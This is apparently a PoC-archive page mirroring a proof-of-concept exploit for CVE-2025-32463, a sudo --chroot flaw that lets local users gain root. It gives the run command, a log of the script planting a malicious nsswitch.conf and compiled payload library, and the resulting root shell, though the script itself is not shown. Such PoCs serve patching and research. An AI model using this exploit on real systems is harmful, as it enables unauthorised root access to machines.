Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-32463 PoC — Sudo 安全漏洞

Source
Associated Vulnerability
Title:Sudo 安全漏洞 (CVE-2025-32463)
Description:Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the --chroot option.
Readme
# CVE-2025-32463_Exploit

受危害版本 1.9.14 to 1.9.17

```shell
bash run.sh
```
成功如下

```shell
neko@aosc-neko205 [ CVE-2025-32463_Exploit@main ] $ bash run.sh 
[+] CVE-2025-32463 Sudo chroot 漏洞复现脚本
[*] 正在创建临时工作目录...
[*] 工作目录已创建: /tmp/sudo_exploit.nc0EjT
[*] 正在创建 C 语言 payload (woot1337.c)...
[*] 正在设置 chroot 环境和恶意的 nsswitch.conf...
[*] 正在将 payload 编译为共享库 (libnss_/woot1337.so.2)...
[*] 编译成功!
[+] root shell!!!!!
woot!
root@aosc-neko205 [ / ] # id
uid=0(root) gid=0(root) 组=0(root),11(audio),12(video),15(cdrom),974(ollama),997(wheel),999(plugdev),1001(neko),1002(gamemode)
root@aosc-neko205 [ / ] # exit
```
File Snapshot

[4.0K] /data/pocs/712605f36f02981c5bceb7fabfe4af18ab345a60 ├── [ 729] README.md └── [1.4K] run.sh 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →